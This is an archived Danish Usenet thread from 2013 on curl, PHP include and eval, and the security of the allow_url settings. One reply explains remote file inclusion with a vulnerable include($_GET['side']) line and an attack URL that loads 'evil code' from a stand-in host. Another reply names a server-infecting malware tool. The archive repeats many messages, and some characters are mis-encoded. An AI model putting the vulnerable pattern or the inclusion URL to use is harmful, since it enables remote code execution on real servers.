Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss
Curl, sikkerhed og et par spørgsmål
3 views
Skip to first unread message
Bertel Lund Hansen
Jan 7, 2013, 8:12:11 AM1/7/13
to
Hej alle sammen
Jeg har just opdaget hvad man kan med Curl, men det får mig til
at spekulere på om ikke hackerne også bare kan bruge Curl. Hvori
ligger sikkerheden?
Det startede med at jeg fandt en side der beskrev hvordan man
løste forskellige problemer hvis serveren har spærret for
allow_osv. Det var en underlig side, for der var brugt forskellig
notation, og samme opskrift uanset om det var include eller
file() der skulle lappes. Det virkede ikke med
include-erstatningen.
Findes der en måde at lave include via Curl?
Og så har jeg glemt en funktion:
Hvordan er det man får en streng parset som PHP?
$streng="include options.inc.php;";
parse_som_php($streng);
?
--
Bertel
http://bertel.lundhansen.dk/ http://fiduso.dk/
Jeg har just opdaget hvad man kan med Curl, men det får mig til
at spekulere på om ikke hackerne også bare kan bruge Curl. Hvori
ligger sikkerheden?
Det startede med at jeg fandt en side der beskrev hvordan man
løste forskellige problemer hvis serveren har spærret for
allow_osv. Det var en underlig side, for der var brugt forskellig
notation, og samme opskrift uanset om det var include eller
file() der skulle lappes. Det virkede ikke med
include-erstatningen.
Findes der en måde at lave include via Curl?
Og så har jeg glemt en funktion:
Hvordan er det man får en streng parset som PHP?
$streng="include options.inc.php;";
parse_som_php($streng);
?
--
Bertel
http://bertel.lundhansen.dk/ http://fiduso.dk/
Mads Lie Jensen
Jan 7, 2013, 8:14:01 AM1/7/13
to
On 07-01-2013 14:12, Bertel Lund Hansen wrote:
> Og så har jeg glemt en funktion:
> Hvordan er det man får en streng parset som PHP?
>
> $streng="include options.inc.php;";
> parse_som_php($streng);
Er det eval() du tænker på?
> Og så har jeg glemt en funktion:
> Hvordan er det man får en streng parset som PHP?
>
> $streng="include options.inc.php;";
> parse_som_php($streng);
Martin
Jan 7, 2013, 8:24:51 AM1/7/13
to
On 07-01-2013 14:12, Bertel Lund Hansen wrote:
/var/www/file.php
Så kan man få den rå php fil
Bruger man en http adresse, så vil man aldrig kunne få PHP koden, men
kun outputtet fra php siden.
$streng = '<?php echo "foo"; ?>';
eval($streng);
Bertel Lund Hansen
Jan 7, 2013, 9:28:51 AM1/7/13
to
Mads Lie Jensen skrev:
>> Hvordan er det man f�r en streng parset som PHP?
> Er det eval() du t�nker p�?
Ja, der var den.
>> Hvordan er det man f�r en streng parset som PHP?
> Er det eval() du t�nker p�?
Ja, der var den.
Bertel Lund Hansen
Jan 7, 2013, 9:40:39 AM1/7/13
to
Martin skrev:
> Hvis man bruger curl mod sit egne filer, alts� direkte mod filen eg curl
> /var/www/file.php
> S� kan man f� den r� php fil
> Bruger man en http adresse, s� vil man aldrig kunne f� PHP koden, men
url-adgang?
Jeg kan tage det eksempel jeg arbejdede med.
Jeg har en offentlig mailadresse som udskiftes af og til. For at
jeg ikke skal rette i alle mine hjemmesider hver gang, har jeg
specificeret den i en fil et bestemt sted s�dan:
$bertelmail='kanon...@lundhansen.dk';
Filtypen ender ikke p� .php. Det nemmeste ville selvf�lgelig v�re
at bruge include, men det er der sp�rret for (jeg kan dog godt
�bne for det).
Med Curl henter jeg s� strengen, $line, og derefter:
list($dummy,$bertelmail)=explode("'",$line);
Hvorfor er det mere sikkert? Hvis jeg omd�ber min fil til noget
med inc.php, kan Curl ikke se den uanset om jeg s� �bner for
begge allow_url_*.
> Hvis man bruger curl mod sit egne filer, alts� direkte mod filen eg curl
> /var/www/file.php
> S� kan man f� den r� php fil
> Bruger man en http adresse, s� vil man aldrig kunne f� PHP koden, men
> kun outputtet fra php siden.
Hvad er forskellen fra en server hvor der er �bnet for
url-adgang?
Jeg kan tage det eksempel jeg arbejdede med.
Jeg har en offentlig mailadresse som udskiftes af og til. For at
jeg ikke skal rette i alle mine hjemmesider hver gang, har jeg
specificeret den i en fil et bestemt sted s�dan:
$bertelmail='kanon...@lundhansen.dk';
Filtypen ender ikke p� .php. Det nemmeste ville selvf�lgelig v�re
at bruge include, men det er der sp�rret for (jeg kan dog godt
�bne for det).
Med Curl henter jeg s� strengen, $line, og derefter:
list($dummy,$bertelmail)=explode("'",$line);
Hvorfor er det mere sikkert? Hvis jeg omd�ber min fil til noget
med inc.php, kan Curl ikke se den uanset om jeg s� �bner for
begge allow_url_*.
Jonathan Stein
Jan 8, 2013, 6:22:10 AM1/8/13
to
Den 07-01-2013 14:12, Bertel Lund Hansen skrev:
> Jeg har just opdaget hvad man kan med Curl, men det f�r mig til
> at spekulere p� om ikke hackerne ogs� bare kan bruge Curl. Hvori
> ligger sikkerheden?
Forskellen er nok hvordan, man normalt bruger funktionerne.
Hvis man har en skabelon, der bliver kaldt med index.php?side=info,
index.php?side=kontakt o.s.v., er der nok mere end en programm�r, der
har implementeret det med:
include($_GET['side']);
- hvilket er et rent tag-selv bord, hvis en hacker kalder
index.php?side=http://example.com/min/onde/kode.php
M.v.h.
Jonathan
> Jeg har just opdaget hvad man kan med Curl, men det f�r mig til
> at spekulere p� om ikke hackerne ogs� bare kan bruge Curl. Hvori
> ligger sikkerheden?
Forskellen er nok hvordan, man normalt bruger funktionerne.
Hvis man har en skabelon, der bliver kaldt med index.php?side=info,
index.php?side=kontakt o.s.v., er der nok mere end en programm�r, der
har implementeret det med:
include($_GET['side']);
- hvilket er et rent tag-selv bord, hvis en hacker kalder
index.php?side=http://example.com/min/onde/kode.php
M.v.h.
Jonathan
Jonathan Stein
Jan 8, 2013, 6:25:30 AM1/8/13
to
Den 07-01-2013 15:40, Bertel Lund Hansen skrev:
> Jeg har en offentlig mailadresse som udskiftes af og til. For at
> jeg ikke skal rette i alle mine hjemmesider hver gang, har jeg
> specificeret den i en fil et bestemt sted s�dan:
>
> $bertelmail='kanon...@lundhansen.dk';
Hvorfor overhovedet have PHP-kode i den fil? Hvis filen KUN indeholder
> Jeg har en offentlig mailadresse som udskiftes af og til. For at
> jeg ikke skal rette i alle mine hjemmesider hver gang, har jeg
> specificeret den i en fil et bestemt sted s�dan:
>
> $bertelmail='kanon...@lundhansen.dk';
adressen, kan du bare bruge $bertelmail = file_get_contents(...);
(eller hente data med curl).
Hvis du henter en .php fil p� en anden (PHP-)server, vil du f� outputtet
fra PHP-filen (alts� ikke den r� fil) uanset om du bruger include eller
curl.
M.v.h.
Jonathan
Bertel Lund Hansen
Jan 9, 2013, 5:34:25 AM1/9/13
to
Jonathan Stein skrev:
To grunde:
1. Den var oprindeligt lavet som en include-fil og fungerede som
s�dan indtil udbyderen lukkede for de to allow-flag.
2. Variabelnavnet $bertelmail minder mig om hvad linjen bruges
til.
> Hvis du henter en .php fil p� en anden (PHP-)server, vil du f� outputtet
> fra PHP-filen (alts� ikke den r� fil) uanset om du bruger include eller
> curl.
Det er forkert. Include inkorporerer den inkluderede fil som om
den var skrevet direkte i det includerende script.
To grunde:
1. Den var oprindeligt lavet som en include-fil og fungerede som
s�dan indtil udbyderen lukkede for de to allow-flag.
2. Variabelnavnet $bertelmail minder mig om hvad linjen bruges
til.
> Hvis du henter en .php fil p� en anden (PHP-)server, vil du f� outputtet
> fra PHP-filen (alts� ikke den r� fil) uanset om du bruger include eller
> curl.
den var skrevet direkte i det includerende script.
Martin Larsen
Jan 9, 2013, 6:32:17 AM1/9/13
to
Bertel Lund Hansen wrote:
>> > Hvis du henter en .php fil på en anden (PHP-)server, vil du få outputtet
>> > fra PHP-filen (altså ikke den rå fil) uanset om du bruger include eller
php-filen i din egen kode hvis filen ligger på en fremmed server. Du får
aldrig adgang til vedkommendes php-kode.
>> > Hvis du henter en .php fil på en anden (PHP-)server, vil du få outputtet
>> > fra PHP-filen (altså ikke den rå fil) uanset om du bruger include eller
>> > curl.
> Det er forkert. Include inkorporerer den inkluderede fil som om
> den var skrevet direkte i det includerende script.
Jonathan har ret. Uanset hvad du gør får du kun inkluderet resultatet af
> Det er forkert. Include inkorporerer den inkluderede fil som om
> den var skrevet direkte i det includerende script.
php-filen i din egen kode hvis filen ligger på en fremmed server. Du får
aldrig adgang til vedkommendes php-kode.
Bertel Lund Hansen
Jan 9, 2013, 7:10:23 AM1/9/13
to
Martin Larsen skrev:
> Jonathan har ret. Uanset hvad du gør får du kun inkluderet resultatet af
> php-filen i din egen kode hvis filen ligger på en fremmed server. Du får
> aldrig adgang til vedkommendes php-kode.
Nå ja, jeg fik rodet det rundt.
> Jonathan har ret. Uanset hvad du gør får du kun inkluderet resultatet af
> php-filen i din egen kode hvis filen ligger på en fremmed server. Du får
> aldrig adgang til vedkommendes php-kode.
Stig Johansen
Jan 10, 2013, 2:42:45 AM1/10/13
to
Namogofer er i hvert fald udbredt, s�g selv, men eks:
http://forums.devnetwork.net/viewtopic.php?f=34&p=448124
Den er styg(eller genial om man vil), for den muligg�r at man kan inficere
en server og slette alle spor.
Har man ikke en _meget_ detaljeret log, aner man ikke hvad der ramte en,
blot at serveren er fyldt med diverse malware.
--
Med venlig hilsen
Stig Johansen
0 new messages